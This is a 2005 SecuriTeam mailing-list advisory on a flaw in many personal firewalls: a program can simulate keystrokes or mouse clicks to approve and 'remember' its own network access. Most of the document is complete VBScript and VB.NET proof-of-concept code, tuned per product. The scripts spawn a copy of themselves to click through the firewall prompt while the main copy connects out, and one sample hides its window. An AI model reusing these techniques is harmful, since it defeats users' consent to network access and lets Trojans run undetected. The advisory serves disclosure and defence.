Date: 9 Jan 2005 17:04:41 +0200
From: SecuriTeam <support@securiteam.com.>
To: list@securiteam.com
Subject: [NT] Multiple Firewall Products Bypass Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Firewall Products Bypass Vulnerability
------------------------------------------------------------------------
SUMMARY
Most of personal Firewalls allow shortcuts or interface for controlling
traffic. It's simple to bypass these Firewalls by utilizing a
multi-threaded program combined with the ability to send keys or to
control the mouse.
This flaw enables any Trojan or similar programs to easily bypass the
Firewall and act as a server or access point to another computer. Also
most of these Firewalls have a "remember" option therefore, if you bypass
the Firewall and successfully exploit it, Firewall will never return to
its previous condition (warning the user, or blocking the attack).
DETAILS
Vulnerable Products (Sending Key Method and Mouse Control):
These products are vulnerable to both of "Sending Key Method" and "Mouse
Control Method"
* ZoneAlarm / ZoneAlarm Pro (www.zonelabs.com) | Fixed
o 4.5.530.000
o 4.5.538.001
o 5 and newer versions are not vulnerable
* Kerio (www.kerio.com)
o 4.0.14
* Agnitium Outpost Firewall (www.agnitium.com)
o 2.1.303.4009 (314)
o 2.5.369.4608 (369)
* Kaspersky Anti-Hacker (www.kaspersky.com)
o 1.5.119.0
* Look 'n' Stop (www.looknstop.com)
o 2.04p2
* Symantec's Norton Personal Firewall (www.norton.com)
o 2004
Vulnerable Products (Mouse Control):
These products are only vulnerable to "Mouse Control Method", because they
don't accept shortcuts but still vulnerable to "Mouse Control" attacks.
* Panda Platinum Internet Security
o 8.03
* Omniquad Personal Firewall
o 1.1
Proof of Concept:
2 Proof of Concepts attached to advisory (also some other POCs for some
Firewalls)
First POC (bypassSendKey.vbs) written in VBScript (.vbs), This POC include
required samples for ZoneAlarm, Kerio, Agnitium, Kaspersky Anti-Hacker,
Look 'n' Stop and Symantec's Norton Personal Firewall. This script is
executing an instance of itself for multithreading and send shortcuts to
firewall while first instance trying to connect internet. Ferruh didn't
write an auto determine firewall function (but it's so easy), so you need
to set it by yourself.
Second (bypassMouseControl.txt) simulates an example of bypassing Zone
Alarm Firewall by with mouse control, code in VB.NET. Program is not using
a real multithread because some firewalls interrupt executing of program
directly. So program is executing another instance of itself with an
argument.
Both of them add themselves to secure app list of firewalls and then
bypass active firewall.
Also, Ferruch attached testFirewall.vbs for testing your firewall for
application control.
Possible workaround:
All firewalls should ask password for all kind of "Allow" actions. In fact
passwords can be fooled because of its nature but it is the best user
friendly / secure solution for protection.
As a user of these firewalls, if your firewall supports to "deny all
default" option, enable it, so your firewall deny all connections by
default. After that you may can manually select programs for allow them.
Exploits:
All the exploits attached below are also available from:
<http://ferruh.mavituna.com/opensource/firewallbypass.zip>;
http://ferruh.mavituna.com/opensource/firewallbypass.zip
Outpost
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh Mavituna
'Const DELAY = 1000
'Const TIMES = 1
'Const EXTRADELAY = 0
'***********************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 1000
Const TIMES = 1
Const EXTRADELAY = 0
appName = Wscript.ScriptName
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
'First Sleep for a while
If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
'Force
While i<TIMES
i=i+1
WScript.Sleep DELAY
'1) First add it trusted
shell.sendKeys "+{TAB}" 'Go back once
shell.sendKeys "{UP 2}" 'Go Up
'1) Press Enter
shell.sendKeys "{ENTER}" 'Enter
Wend
'Exit
'Wscript.Echo "Exit !"
Wscript.Quit 1
End If
'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission
Accomplished..."
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL)
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
connect = web.getAllResponseHeaders
Set web = Nothing
End Function
Anti-hacker
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'HISTORY
'3/5/2004
'Added ZA
'5/5/2004
'Added Kerio, Outpost
'6/5/2004
'Added Kaspersky Anti-Hacker
'***********************************************************
Option Explicit
Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall
'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
'// Firewalls
'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP)
Const ZoneAlarm = 0
'Kerio 4.0.14
Const Kerio = 1
'Agnitium Outpost Firewall 2.1.303.4009 (314)
Const Outpost = 2
'Kaspersky Anti-Hacker 1.5.119.0
Const Kaspersky = 3
'Select Active Firewall
intFirewall = Kaspersky
'// Configuration
'Kaspersky Anti-Hacker
arrDelays(Kaspersky,0) = 1000
arrDelays(Kaspersky,1) = 1
'Define Keys for Firewalls
arrKeys(Kaspersky,0) = "{ENTER}"
If DETERMINEFIREWALL Then
'TODO:Read Registries and determine it !
End If
Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
'First Sleep for a while
If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
'Force
While i<arrDelays(intFirewall,1)
i=i+1
WScript.Sleep arrDelays(intFirewall,0)
'Send Keys
For j=0 To Ubound(arrKeys,2)
If arrKeys(intFirewall,j)<>"" Then
shell.sendKeys arrKeys(intFirewall,j)
End If
Next
Wend
'Exit
'Wscript.Echo "Exit !"
Wscript.Quit 1
End If
'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission
Accomplished..."
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL)
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
connect = web.getAllResponseHeaders
Set web = Nothing
End Function
ZoneAlarm
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
While i<TIMES
i=i+1
WScript.Sleep DELAY
shell.sendKeys "%R" 'Remember, Do not ask again !
shell.sendKeys "%Y" 'Click Yes
Wend
'Exit
'Wscript.Echo "Exit !"
Wscript.Quit 1
End If
'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")
'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission
Accomplished..."
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL)
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
connect = web.getAllResponseHeaders
Set web = Nothing
End Function
testFirewall
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and
multithreading
'// Simple Firewall Test File
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit
Dim shell, sendKeyMod, Result
Const URL = "http://ferruh.mavituna.com"
'Connect
Wscript.Echo "Now I'll try to connect to " & URL
If connect(URL,Result) Then
Wscript.Echo "Mission Accomplished..., Here is the headers;" &
vbNewline & Result
Else
Wscript.Echo "OK, I couldn't access to Internet"
End If
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL, ByRef Result)
connect = True
On Error Resume Next
ERR.Clear
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
Result = web.getAllResponseHeaders
Set web = Nothing
If ERR<>0 Then connect = False
End Function
Norton Firewall
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i
Const DELAY = 10
Const TIMES = 15
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
While i<TIMES
i=i+1
WScript.Sleep DELAY
shell.sendKeys "%A" 'Remember, Do not ask again !
shell.sendKeys "%O" 'Click Yes
Wend
'Customized for norton fw by Oezguer Mavituna
'Exit
'Wscript.Echo "Exit !"
Wscript.Quit 1
End If
'Wscript.Echo WScript.ScriptFullName
Call shell.Run("skipZA.vbs /send")
'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission
Accomplished..."
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL)
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
connect = web.getAllResponseHeaders
Set web = Nothing
End Function
MoseControl
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 5/19/2004
'// Simple POC for Bypassing multiple firewall products
'// Code : VB.NET
'***********************************************************
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal
dx As Long, ByVal dy As Long, ByVal cbuttons As Long, ByVal dwExtraInfo As
Long)
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As
Long)
Private Const MOUSEEVENTF_LEFTDOWN = &H2
Private Const MOUSEEVENTF_LEFTUP = &H4
Private Const MOUSEEVENTF_MIDDLEDOWN = &H20
Private Const MOUSEEVENTF_MIDDLEUP = &H40
Private Const MOUSEEVENTF_RIGHTDOWN = &H8
Private Const MOUSEEVENTF_RIGHTUP = &H10
Private Const sleepTime = 0.5 'As Second
Private Const slowMotion = True 'Debug !
'Firewalls
Const ZoneAlarm As Integer = 0
'Set Points
Dim arrFirewalls(1, 3) As Integer
Dim activeFirewall As Integer = ZoneAlarm
Private Sub setupFirewalls()
'Get Current Screen
'This is just POC, Real World Example should automaticly
detect installed firewall, change sleep times, car about exact positoin,
taskbar position etc. But It's easy to write a real world example
Dim screenY As Integer =
Screen.PrimaryScreen.Bounds.Height
Dim screenX As Integer = Screen.PrimaryScreen.Bounds.Width
arrFirewalls(ZoneAlarm, 0) = screenX - 250 'X
Remember !
arrFirewalls(ZoneAlarm, 1) = screenY - 130
'Y
arrFirewalls(ZoneAlarm, 2) = screenX - 190 '
Yes
arrFirewalls(ZoneAlarm, 3) = screenY - 93
End Sub
Private Sub frmFirewallTest_Load(ByVal sender As System.Object,
ByVal e As System.EventArgs) Handles MyBase.Load
'Hide App
Me.ShowInTaskbar = False
Me.Visible = False
'Args
Dim flagArg As String = Application.ExecutablePath
If Environment.GetCommandLineArgs().Length > 1 Then
'Sleep;
Sleep(sleepTime * 1000)
'Try;
setupFirewalls()
If slowMotion Then Sleep(1000)
'First Access
bypassFirewall(arrFirewalls(activeFirewall, 0),
arrFirewalls(activeFirewall, 1))
If slowMotion Then Sleep(1000)
bypassFirewall(arrFirewalls(activeFirewall, 2),
arrFirewalls(activeFirewall, 3))
'Gain Access for HTTP
Sleep(300)
If slowMotion Then Sleep(1000)
bypassFirewall(arrFirewalls(activeFirewall, 0),
arrFirewalls(activeFirewall, 1))
If slowMotion Then Sleep(1000)
bypassFirewall(arrFirewalls(activeFirewall, 2),
arrFirewalls(activeFirewall, 3))
'Quit !
Me.Dispose()
Else
System.Diagnostics.Process.Start(flagArg,
"skipme")
'Access Internet
If downloadURL() Then
MessageBox.Show("Successed !, Firewall
ByPassed !", "Firewall ByPassed !", MessageBoxButtons.OK,
MessageBoxIcon.Warning)
End If
Me.Dispose()
End If
End Sub
'Bypas POC
Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer)
'Save Old Positions for return !
Dim oldX As Integer = Cursor.Position.X
Dim oldY As Integer = Cursor.Position.Y
'Set New Position
Cursor.Position = New Point(X, Y)
'Click
mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
'Return
Cursor.Position = New Point(oldX, oldY)
End Sub
'Connect Internet
Private Function downloadURL() As Boolean
downloadURL = True
Try
Dim wc As New System.Net.WebClient()
wc.DownloadFile("http://ferruh.mavituna.com",
"C:\firewalltest.htm")
Catch
MessageBox.Show("Can not connected !", "Not
Connected !", MessageBoxButtons.OK, MessageBoxIcon.Error)
downloadURL = False
End Try
End Function
bypassSendKey
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Bypassing multiple firewall products
'***********************************************************
'HISTORY
'3/5/2004
'Added ZA
'5/5/2004
'Added Kerio, Outpost
'6/5/2004
'Added Kaspersky Anti-Hacker
'5/9/2004
'LooknStop
'5/20/2004
'Norton
'***********************************************************
Option Explicit
Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall
Const EXTRADELAY = 0
Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall
'----------------------------------------------
'Define Delays and Times for Firewalls
'----------------------------------------------
'// Firewalls
'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) |
www.zonelabs.com
Const ZoneAlarm = 0
'Kerio 4.0.14
Const Kerio = 1
'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com
Const Outpost = 2
'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com
Const Kaspersky = 3
'Look 'n' Stop 2.04p2 | www.looknstop.com
Const LooknStop = 4
'Norton | www.norton.com
Const Norton = 5
'Select Active Firewall
intFirewall = ZoneAlarm
'// Configuration
'Define Keys, Delays, Repeat Times for Firewalls
'Kaspersky Anti-Hacker
arrDelays(Kaspersky,0) = 400
arrDelays(Kaspersky,1) = 2
arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK
'ZoneAlarm
arrDelays(ZoneAlarm,0) = 10
arrDelays(ZoneAlarm,1) = 15
arrKeys(ZoneAlarm,0) = "%R" 'Select Remember
arrKeys(ZoneAlarm,1) = "%Y" 'Yes
'Outpost
arrDelays(Outpost,0) = 1000
arrDelays(Outpost,1) = 1
arrKeys(Outpost,0) = "+{TAB}" 'Go back once
arrKeys(Outpost,1) = "{UP 2}" 'Go Up
arrKeys(Outpost,1) = "{ENTER}" 'Enter
'Kerio
arrDelays(Kerio,0) = 100
arrDelays(Kerio,1) = 10
arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again !
arrKeys(Kerio,1) = "%P" ' Yes
'LookNStop
arrDelays(LooknStop,0) = 1000
arrDelays(LooknStop,1) = 1
arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize
arrKeys(LooknStop,1) = "{LEFT}" ' Left
arrKeys(LooknStop, 2) = " " ' Space
'Norton
arrDelays(Norton,0) = 100
arrDelays(Norton,1) = 5
arrKeys(Norton,0) = "%A" ' Allow
arrKeys(Norton,1) = "%O" ' OK
If DETERMINEFIREWALL Then
'TODO:Read Registries and determine it !
End If
Dim argLen, shell, sendKeyMod, i, j, appName
appName = Wscript.ScriptName
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
'First Sleep for a while
If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY
'Force
While i<arrDelays(intFirewall,1)
i=i+1
WScript.Sleep arrDelays(intFirewall,0)
'Send Keys
For j=0 To Ubound(arrKeys,2)
If arrKeys(intFirewall,j)<>"" Then
shell.sendKeys arrKeys(intFirewall,j)
End If
Next
Wend
'Exit
'Wscript.Echo "Exit !"
Wscript.Quit 1
End If
'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission
Accomplished..."
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL)
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
connect = web.getAllResponseHeaders
Set web = Nothing
End Function
Kerio
'***********************************************************
'// By Ferruh Mavituna
'// ferruh{@}mavituna.com, http://ferruh.mavituna.com
'***********************************************************
'// Date : 4/25/2004
'// Simple POC for Skipping Zone Alarm Firewall with sendKeys and
multithreading
'// Related Advisory : NOT PUBLISHED YET
'***********************************************************
'Modified for Kerio 4.0.14
'5/5/2004
'Ferruh Mavituna
'Const DELAY = 100
'Const TIMES = 10
'***********************************************************
Option Explicit
Dim argLen, shell, sendKeyMod, i, appName
Const DELAY = 100
Const TIMES = 10
appName = Wscript.ScriptName
'SendKey
sendkeyMod = False
argLen = WScript.Arguments.Length
If argLen>0 Then sendkeyMod = True
Set shell = WScript.CreateObject("WScript.Shell")
If sendKeyMod Then
While i<TIMES
i=i+1
WScript.Sleep DELAY
shell.sendKeys " " 'Remember, Do not ask again !
shell.sendKeys "%P" 'Click Yes
Wend
'Exit
'Wscript.Echo "Exit !"
Wscript.Quit 1
End If
'Wscript.Echo WScript.ScriptFullName
Call shell.Run(appName & " /send")
'Connect
Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission
Accomplished..."
Set shell = Nothing
Wscript.Quit 1
Function connect(ByVal URL)
Dim web
Set web = CreateObject("Microsoft.XmlHttp")
web.open "HEAD", URL, FALSE
web.send ""
connect = web.getAllResponseHeaders
Set web = Nothing
End Function
ADDITIONAL INFORMATION
The information has been provided by <mailto:ferruh@mavituna.com.> Ferruh
Mavituna.
The original article can be found at:
<http://ferruh.mavituna.com/article/?769>;
http://ferruh.mavituna.com/article/?769
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
